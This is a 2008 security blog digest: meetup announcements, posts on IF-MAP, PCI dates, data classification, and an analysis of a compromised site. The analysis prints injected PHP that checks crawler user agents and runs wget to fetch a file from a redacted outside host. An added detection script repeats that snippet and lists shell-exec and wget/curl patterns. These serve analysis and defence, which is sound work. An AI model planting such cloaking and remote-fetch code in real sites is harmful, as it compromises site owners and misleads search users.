  • Who: Nadya Bartol, Booz Allen Hamilton & Paco Hope, Cigital
  • What:
    • Bartol - Framework for Software Assurance: Nadya’s presentation will provide an update on the Software Assurance Forum efforts to establish a comprehensive framework for software assurance (SwA) and security measurement. The Framework addresses measuring achievement of SwA goals and objectives within the context of individual projects, programs, or enterprises. It targets a variety of audiences including executives, developers, vendors, suppliers, and buyers. The Framework leverages existing measurement methodologies, including Practical Software and System Measurement (PSM); CMMI Goal, Question, Indicator, Measure (GQ(I)M); NIST SP 800-55 Rev1; and ISO/IEC 27004 and identifies commonalities among the methodologies to help organizations integrate SwA measurement in their overall measurement efforts cost-effectively and as seamlessly as possible, rather than establish a standalone SwA measurement effort within an organization. The presentation will provide an update on the SwA Forum Measurement Working Group work, present the current version of the Framework and underlying measures development and implementation processes, and propose example SwA measures applicable to a variety of SwA stakeholders. The presentation will update the group on the latest NIST and ISO standards on information security measurement that are being integrated into the Framework as the standards are being developed.
    • Hope - The Web Security Testing Cookbook: The Web Security Testing Cookbook (O’Reilly & Associates, October 2008) gives developers and testers the tools they need to make security testing a regular part of their development lifecycle. Its recipe style approach covers manual, exploratory testing as well automated techniques that you can make part of your unit tests or regression cycle. The recipes cover the basics like observing messages between clients and servers, to multi-phase tests that script the login and execution of web application features. This book complements many of the security texts in the market that tell you what a vulnerability is, but not how to systematically test it day in and day out. Leverage the recipes in this book to add significant security coverage to your testing without adding significant time and cost to your effort.
  • When: 11/13, 6:00 - 8:30 PM EST
  • Where: Booz Allen, One Dulles Facility (13200 Woodland Park Road; Herndon, VA 20171)

For more information on the OWASP - VA Local Chapter, see its description in our NoVA Meetups section. View our Calendar for a complete list of infosec events in and around the NoVA area. Here is a link to the page with information on this meetup.

ISACA - CM Chapter Infosec Meetup Event - Wednesday, 11-12: Strong User Authentication []

Posted: 12 Nov 2008 12:02 AM CST

Here is some information regarding this week’s Wednesday ISACA - Central Maryland (CM) Chapter infosec meetup event. A little late on this one I guess.

  • Who: Chris Kostick, Ernst & Young
  • What: Enterprise-wide Strong User Authentication: Are We There Yet?
    • Many security experts believe that employee username and passwords are passé and on the way out. Is that true? If so, what is the alternative? This session discusses the different aspects of using strong authentication for internal users to systems and applications. It examines the technologies available, the benefits/challenges of deploying these technologies, where it’s been successful, where it hasn’t, the barriers of deployment, and what we can do about it. The following topics will be covered: The options for strong authentication technologies for the enterprise; Pros/cons of the technologies and why; Challenges to deployment; Practical examples of deployment; Determine tactics and discussion points with the vendors; and Present a framework for managing strong authentication for internal users over the entire enterprise.
  • When: 11/12, 11:00 - 4:30 PM EST
  • Where: Snyder’s Willow Grove Restaurant (841 North Hammonds Ferry Road, Linthicum, MD)

For more information on the ISACA - CM Chapter, see its description in our NoVA Meetups section. View our Calendar for a complete list of infosec events in and around the NoVA area. Here is a link to the page with information on this meetup.

I Can Haz TCG IF-MAP Support In Your Security Product, Please... [Rational Survivability]

Posted: 11 Nov 2008 02:33 PM CST

In my previous post titled "Cloud Computing: Invented By Criminals, Secured By ???" I described the need for a new security model, methodology and set of technologies in the virtualized and cloud computing realms built to deal with the dynamic and distributed nature of evolving computing:

This basically means that we should distribute the sampling, detection and prevention functions across the entire networked ecosystem, not just to dedicated security appliances; each of the end nodes should communicate using a standard signaling and telemetry protocol so that common threat, vulnerability and effective disposition can be communicated up and downstream to one another and one or more management facilities.

Greg Ness from Infoblox reminded me in the comments of that post of something I was very excited about when it became news at InterOp this last April: the Trusted Computing Group's (TCG) extension to the Trusted Network Connect (TNC) architecture called IF-MAP.

IF-MAP is a standardized real-time publish/subscribe/search mechanism which utilizes a client/server, XML-based SOAP protocol to provide information about network security objects and events including their state and activity:

IF-MAP extends the TNC architecture to support standardized, dynamic data interchange among a wide variety of networking and security components, enabling customers to implement multi-vendor systems that provide coordinated defense-in-depth.
Today's security systems – such as firewalls, intrusion detection and prevention systems, endpoint security systems, data leak protection systems, etc. – operate as "silos" with little or no ability to "see" what other systems are seeing or to share their understanding of network and device behavior. 

This limits their ability to support coordinated defense-in-depth.  In addition, current NAC solutions are focused mainly on controlling network access, and lack the ability to respond in real-time to post-admission changes in security posture or to provide visibility and access control enforcement for unmanaged endpoints.  By extending TNC with IF-MAP, the TCG is providing a standard-based means to address these issues and thereby enable more powerful, flexible, open network security systems.

While the TNC was initially designed to support NAC solutions, extending the capabilities to any security product to subscribe to a common telemetry and information exchange/integration protocol is a fantastic idea.


I'm really interested in how many vendors outside of the NAC space are including IF-MAP in their roadmaps. While IF-MAP has potential in conventional non-virtualized infrastructure, I see a tremendous need for it in our move to Infrastructure 2.0 with virtualization and Cloud Computing. 

Integrating, for example, IF-MAP with VM-Introspection capabilities (in VMsafe, XenAccess, etc.) would be fantastic as you could tie the control planes of the hypervisors, management infrastructure, and provisioning/governance engines with that of security and compliance in near-time.

You can read more about the TCG's TNC IF-MAP specification here.
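For readers who have not looked at the spec, here is an added, deliberately simplified model of the publish/search/subscribe semantics described above (example code; it is not the TCG's reference implementation and does not use the SOAP/XML wire format). A NAC component, an IDS and a firewall share one in-memory "MAP": identifiers such as ip-address and access-request are nodes, metadata such as ip-mac and event hang on the links between them, and the firewall subscribes to an access request so that a high-severity event published later by the IDS reaches it without any direct integration between the two products. The identifier and metadata names are modeled loosely on IF-MAP's, and the scenario, addresses and severity values are constructed for the demo.

```python
from collections import defaultdict, deque


class MapServer:
    """Toy metadata access point: identifiers are nodes, metadata hangs on links."""

    def __init__(self):
        self.links = defaultdict(dict)   # frozenset{id_a, id_b} -> {name: (publisher, value)}
        self.subscriptions = []          # (identifier, max_depth, callback)

    def publish(self, publisher, id_a, id_b, name, value):
        """Attach (or overwrite) metadata on the link between two identifiers."""
        key = frozenset((id_a, id_b))
        self.links[key][name] = (publisher, dict(value))
        self._notify(key)

    def delete(self, id_a, id_b, name):
        key = frozenset((id_a, id_b))
        self.links.get(key, {}).pop(name, None)
        self._notify(key)

    def search(self, start, max_depth=2):
        """Breadth-first walk from `start`; returns (links reached, identifiers reached)."""
        reached, seen_links, result = {start}, set(), []
        frontier = deque([(start, 0)])
        while frontier:
            node, depth = frontier.popleft()
            if depth >= max_depth:
                continue
            for key, meta in self.links.items():
                if node not in key or key in seen_links or not meta:
                    continue
                seen_links.add(key)
                other = next(iter(key - {node}), node)   # a self-link points back at node
                result.append((node, other, dict(meta)))
                if other not in reached:
                    reached.add(other)
                    frontier.append((other, depth + 1))
        return result, reached

    def subscribe(self, identifier, callback, max_depth=2):
        self.subscriptions.append((identifier, max_depth, callback))

    def _notify(self, changed_key):
        """Re-run each subscriber's search and deliver it if the change is in reach."""
        for identifier, depth, callback in self.subscriptions:
            result, reached = self.search(identifier, depth)
            if changed_key & reached:
                callback(identifier, result)


def demo():
    """Constructed scenario: NAC publishes an access request and an ip-mac binding,
    the IDS publishes an event on the same address, and the firewall's subscription
    turns the event into a quarantine decision."""
    mapsrv, decisions = MapServer(), []

    def firewall_policy(identifier, links):
        high = any(meta.get("event", (None, {}))[1].get("severity") == "high"
                   for _, _, meta in links)
        decisions.append("quarantine" if high else "allow")

    mapsrv.subscribe("access-request:ar-1001", firewall_policy)
    mapsrv.publish("nac", "access-request:ar-1001", "ip-address:10.0.0.5",
                   "access-request-ip", {})
    mapsrv.publish("nac", "ip-address:10.0.0.5", "mac-address:00:11:22:33:44:55",
                   "ip-mac", {})
    mapsrv.publish("ids", "ip-address:10.0.0.5", "ip-address:10.0.0.5",
                   "event", {"name": "port-scan", "severity": "high"})
    links, _ = mapsrv.search("access-request:ar-1001")
    return {"decisions": decisions, "links_in_reach": len(links)}


if __name__ == "__main__":
    print(demo())
```

The point of the graph-plus-subscription shape is that the firewall never had to know the IDS exists: it expressed interest in one access request, and anything any publisher later attaches within reach of that request arrives as a fresh search result.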



International PCI Compliance Dates Set [Branden Williams' Security Convergence Blog]

Posted: 11 Nov 2008 12:37 PM CST

The day has come! I can't tell you how many merchants have hounded me for compliance dates outside the US and Canada, and then looked at me like I just told them the sky was red when I could not provide them. Visa, Inc. has formally announced global compliance deadlines (thanks JKA!).

If you are a global retailer, or a retailer not based in the US or Canada, the pressure is now on to become compliant with the PCI Standard! Feel free to reach out to a VeriSign QSA if you need assistance!

Compromised Sites Boost PageRank for Porn [Threat Center Live Blog]

Posted: 11 Nov 2008 11:59 AM CST

A recent analysis of a compromised web site by eSoft's Threat Prevention Team led to the discovery of hidden links designed only to show up when viewed by web crawlers such as those used by Google, Microsoft and Yahoo.

The website reviewed,, appears perfectly normal when viewed from standard browsers, but some PHP code has been injected that gives a long series of links designed to bump the PageRank of certain sites when viewed by a crawler.

The PHP code in question looks like this:


And resolves to this:

// eregi(): case-insensitive match against the visitor's User-Agent header
if ((eregi("bot", $_SERVER["HTTP_USER_AGENT"]) or eregi("urp", $_SERVER["HTTP_USER_AGENT"]) or eregi("msn", $_SERVER["HTTP_USER_AGENT"]))) {
system("wget -O /tmp/getincl.txt http://[redacted].com/temp/incl.txt");
// ... remainder of the injected block not shown in the post
}

When viewing the page with a user agent of googlebot, you get a lot of links that weren't there before. Here's a screenshot of one of the less offensive examples:


In other instances, a ton of porn links and text are displayed instead of the pharmaceutical links shown here.

This just proves the trends from open compromise to secret compromise. Most malware already tries to hide itself; web site defacements seem also to be a thing of the past as compromised sites are used more and more for relaying attacks and for more stealthy, income earning purposes.
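As an added example of how to check a site for this kind of crawler-only content (not eSoft's code and not the injected code from the post), the block below diffs the links in two copies of a page, one as a browser would receive it and one as a crawler would, and also greps PHP source for the combination the snippet above shows: a user-agent test next to a shell call or a remote fetch. The HTML pages, the PHP sample and the example.invalid hosts are constructed for the demo.

```python
import re
from html.parser import HTMLParser


class LinkCollector(HTMLParser):
    """Collect href targets of <a> tags."""

    def __init__(self):
        super().__init__()
        self.links = set()

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.add(value.strip())


def extract_links(html: str) -> set:
    parser = LinkCollector()
    parser.feed(html)
    parser.close()
    return parser.links


def cloaked_links(browser_html: str, crawler_html: str) -> list:
    """Links served only to the crawler user agent, i.e. hidden from visitors."""
    return sorted(extract_links(crawler_html) - extract_links(browser_html))


# Source-level indicators. Any one alone is common in legitimate code; all three
# together match the shape of the injected snippet shown in the post.
SUSPICIOUS_PHP = {
    "ua-check": re.compile(r"HTTP_USER_AGENT", re.I),
    "shell-exec": re.compile(r"\b(system|exec|shell_exec|passthru|popen)\s*\(", re.I),
    "remote-fetch": re.compile(r"\b(wget|curl)\b|file_get_contents\s*\(\s*['\"]https?://", re.I),
}


def flag_php(source: str) -> list:
    """Names of the indicators present in a PHP source string."""
    return sorted(name for name, rx in SUSPICIOUS_PHP.items() if rx.search(source))


# Constructed pages (example.invalid hosts are placeholders, not real sites).
BROWSER_PAGE = """<html><body>
<a href="/about.html">About</a> <a href="/contact.html">Contact</a>
</body></html>"""

CRAWLER_PAGE = """<html><body>
<a href="/about.html">About</a> <a href="/contact.html">Contact</a>
<div style="display:none">
<a href="http://pills.example.invalid/buy">buy</a>
<a href="http://pills.example.invalid/cheap">cheap</a>
<a href="http://other.example.invalid/">more</a>
</div>
</body></html>"""

# Constructed PHP in the shape of the post's snippet, with a placeholder host.
SAMPLE_PHP = """<?php
if ((eregi("bot", $_SERVER["HTTP_USER_AGENT"]) or eregi("msn", $_SERVER["HTTP_USER_AGENT"]))) {
    system("wget -O /tmp/getincl.txt http://example.invalid/temp/incl.txt");
}
?>"""


if __name__ == "__main__":
    print("cloaked:", cloaked_links(BROWSER_PAGE, CRAWLER_PAGE))
    print("php indicators:", flag_php(SAMPLE_PHP))
```

In practice you feed cloaked_links() the bodies of two fetches of your own page made with different User-Agent headers; a non-empty result on a site you did not intentionally cloak is the signal to start looking at the PHP with flag_php().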

Security, Drinking Straws, Cavities and Wrinkles... [Rational Survivability]

Posted: 11 Nov 2008 10:13 AM CST

I was reading an article on SlashFood titled "Drinking Straw: Friend or Foe" and chuckled at the parallels to the reflexive hyping, purchase and (oft failed) use of "solutions" in the security space.  Sometimes I think we need a

Recently, a friend passed along a tip from a dermatologist: Stop sipping through straws. The doctor said it was the number one cause of wrinkles.

Even more recently, at lunch one day my aunt relayed some info from her husband, an orthodontist. He said that drinking through a straw prevents cavities and tooth decay, since straws allow sugary beverages to bypass your teeth. When my aunt said this, everybody around the table (six women) stuck straws in their drinks.

But when I countered with the skincare side of the question, my aunt was the first to pluck her straw right back out again.

Brings new meaning to "security sucks."  What's your favorite "security straw" analogy?


Why We Hate the Insurance Industry [The Falcon's View]

Posted: 11 Nov 2008 09:58 AM CST

If you've ever heard people complain about their insurance provider, either for medical or dental or vision, but never quite understood why that might be, then I'm here to provide you an explanation. My wife recently had a crown made...

(SCC) Catalyst Community Update for November 12, 2008 [The Security Catalyst]

Posted: 11 Nov 2008 09:58 AM CST

It has been an interesting two weeks – thanks to a catastrophic failure on the bulk of my web servers – thanks to an unannounced dreamhost switch/migration that results in their setting all permissions incorrectly. It's a long and boring story – loaded with insights for anyone involved in technology and customer service. But we're fixed – and I'm back.

The last few weeks have been pretty amazing; we have traveled the country from Upstate, NY to Kansas City…. Seattle…. And then back "East" to Detroit. We leave here on Thursday and head to Ohio for two days before heading on to the DC Metro area. CompTIA is sponsoring a book signing and give-away at the CSI show – so look for more details.

Last week – before the blizzards closed down sections of I-90 — we stopped on Monday at Mount Rushmore – and the entire family was taken with the effort on multiple levels. I was drawn to the history of the presidents – and will be spending more time learning about the character of these men, and the way they served themselves and their country. All very inspiring!!

Join the conversation. Take responsibility. Make a difference!

Discussion Forum Activity

I have noticed an exciting trend in the community – more and more people are coming together to "create." The community is reaching another level (and I will be forming a team of volunteers to help improve the available tools) – and it is exciting to realize that by working together, we really can make a difference. Here are some recent discussions ripe for contribution or learning:

Here are three community-based efforts that you can contribute to, or learn from:

 Upcoming Opportunities to Work Together or Meet in Person:

List of community blogger and podcasters

(I am working to ensure the list is accurate and separate out the blogs from the podcasts — let me know if you need to be updated/included)

What Security Blogs and Podcasts are represented in this community? (

Here are some recent blog posts from Community Members that you may have missed:


About the Security Catalyst Community

 We are a positively focused and supportive community that unites passionate professionals to achieve three goals:

(1) Provide a community where it is acceptable to be vulnerable and ask for help when you need it

(2) Create a community where anyone with an idea can share their approach in the pursuit of helping another. If today is your first day in security, welcome - share what you have learned without fear.

(3) Participate in a forum where members can share their passions, expand their thinking and find support with others who believe in making a positive difference.

Signing Up for the Security Catalyst Community

Your participation is your currency (means no charge to join) - the more you contribute the more you learn and the more valuable the community becomes to everyone (so dive in and share).

Registration Overview (NOTE THE NAMING CONVENTION)

      Go here:

      Select the register link

      Follow the naming standard: firstname.lastname (include the period between first and last names)

      Your account will be reviewed and approved

      Jump in and share your thoughts!


Where is Michael - onTour Schedule & Updates

As we set out to journey the country, keep tabs on our schedule and opportunities to meet at or follow the progress of the book and speaking tour at As always, if you are on the way (or in the city we are heading), please contact me directly so we can meet. Our RV is our home, and our home is always open to our friends.

I am also spending more time on twitter these days - and would love to engage in the conversation with you. You can learn more about twitter here: and "follow" and chat with me here:

Coming Up:

Once the RV is repaired (working on it now) and our laptops restored (also in progress), we head right back out – and amazingly, don't really miss a beat!

  • Week of November 10: Southern Michigan (DC Metro) and Ohio
  • Week of November 17: DC Metro – CSI Conference (look for more details) and Philadelphia, PA for a private briefing for the CSO Breakfast Club
  • Week of November 24: Albany, NY – then Hershey, PA
  • Week of December 1: Trenton, NJ
  • Week of December 8: Baltimore/Metro DC

Join The Security Catalyst LinkedIn Group

For active members of the Security Catalyst Community

Data Discovery & Classification []

Posted: 11 Nov 2008 09:21 AM CST

I was reading the RSA report on the Torpig/Sinowal trojan while stuck at the airport for several hours last Thursday. During my many hours of free time I overheard some IT executive discussing the difficulties of implementing data discovery and classification with his peers. I did not catch the name of the company, and probably would not pass it along even if I had, but the tired and whiny rant about their associated failures was not unique. Perhaps I was a bit testy about having to sit in an airport lobby for eight hours, but all I could think was “What is wrong with you? If hackers can navigate your data center, why can’t you?”

That’s where the RSA report just gelled my thoughts on the subject. If a small group, quite literally a handful of hackers, can use Torpig & BlaBla to steal hundreds of thousands of credit card numbers, steal accounts and passwords, install malicious software at multiple company sites … all without being provided credentials, access rights or a specific map of your IT infrastructure … why can’t your company classify its own data and intellectual property assets? You would think that a company, given a modest amount of resources, could discover, classify and categorize its own data. I mean, if you paid someone full time to do it, don’t you think you could get the job done?

Some of the irritating points that they raised …

“Data in motion made it difficult to track”: So what- the hacker tools are kept running and they never stopped scanning. Nor did they give up on the first try; rather they periodically modified their code to adapt for location and type of data, and they were persistent. You should be too.

“Difficulty to classify the data” and “Can’t find stuff you know is there”: So what- hire better programmers. Pressure vendors for better tools. Can’t afford expensive software? There is open source code out there to start with; hackers can do it- so can you. There are at least a dozen programmatic ways to analyze data, through content or even context, and probably even more ways to traverse/crawl/inspect systems. If the application your company uses can find it, so can you.

“Size of the project is difficult to manage”: So what- divide and conquer. Take a specific set of data you are worried about and start there. Compliance group breathing down your neck to meet XYZ regulation? Pick one category (customer accounts, credit card data, source code, whatever). Tune your tools and policies (you didn’t really think you were going to get perfection out of the box, did you?), address that problem, and move on. If you are starting with an ISACA or Cobit framework and trying to map a comprehensive strategy, stop making the problem more complex than it is. Hackers went for low hanging fruit- you should too.

“The results are not accurate”: So what- you’re not going to be 100% right all the time. The hackers aren’t either. Either accept 95-99% accuracy, or try something different. Or maybe your policy is out of line with reality and needs to be reconsidered.

“Expensive” and “Takes too much in the way of resources”: No chance! If hackers can run malware for 18 months at TJX and related stores UNDETECTED, then the methods used are not resource hogs, nor did they invest that much money in the tools.

Sometimes you’ve just got to stop whinin’ and git ‘er done!
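As an added example (not the author's code or any product's) of the "pick one category, tune, move on" approach above, here is a small content-and-context discovery scanner: it walks a directory tree, classifies each file by what it contains (Luhn-validated card numbers, e-mail addresses, a US SSN shape) and by context (a CONFIDENTIAL marker), and can be narrowed to a single category so you can start with the one data type the compliance group is asking about. The sample files it writes to a temp directory and the example.invalid addresses are constructed; the detector patterns are deliberately simple starting points to tune, not a complete policy.

```python
import os
import re
import tempfile

# Content detectors (starting points, meant to be tuned against your own false positives).
CC_CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")
EMAIL = re.compile(r"\b[\w.+-]+@[\w-]+(?:\.[\w-]+)+\b")
SSN = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")


def luhn_ok(digits: str) -> bool:
    """Luhn checksum: filters out most random digit runs that merely look like card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def credit_cards(text: str) -> list:
    """Digit runs of card length (13-19 digits, separators allowed) that pass Luhn."""
    found = []
    for m in CC_CANDIDATE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if 13 <= len(digits) <= 19 and luhn_ok(digits):
            found.append(digits)
    return found


DETECTORS = {
    "credit_card": lambda t: bool(credit_cards(t)),
    "email": lambda t: bool(EMAIL.search(t)),
    "ssn": lambda t: bool(SSN.search(t)),
    "confidential_marker": lambda t: "CONFIDENTIAL" in t.upper(),   # context, not content
}


def classify_text(text: str, categories=None) -> list:
    """Sorted category names that fire on the text; `categories` narrows the scan."""
    names = categories if categories else DETECTORS.keys()
    return sorted(name for name in names if DETECTORS[name](text))


def scan_tree(root: str, categories=None, max_bytes: int = 1_000_000) -> dict:
    """Map each file (relative path) under root to the categories it matched.
    Only the first max_bytes of each file are examined; unreadable files are skipped."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "rb") as fh:
                    text = fh.read(max_bytes).decode("utf-8", errors="ignore")
            except OSError:
                continue
            cats = classify_text(text, categories)
            if cats:
                results[os.path.relpath(path, root).replace(os.sep, "/")] = cats
    return results


def build_sample_tree() -> str:
    """Write constructed sample files (not real data) into a temp directory."""
    root = tempfile.mkdtemp(prefix="discovery-")
    samples = {
        "finance/customers.csv": "name,email,card\nA. Person,a.person@example.invalid,4111 1111 1111 1111\n",
        "eng/notes.txt": "order id 4111111111111112 is not a card number (fails Luhn)\n",
        "hr/plan.txt": "CONFIDENTIAL - staffing plan, contact hr@example.invalid\n",
        "public/readme.txt": "nothing sensitive here\n",
    }
    for rel, content in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    print("all categories:", scan_tree(sample_root))
    print("card data only:", scan_tree(sample_root, ["credit_card"]))
```

Running it with a single category is the "divide and conquer" step from the post: get the card-number detector tuned on one file share, accept that a few percent will be wrong, then add the next category rather than trying to classify everything at once.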

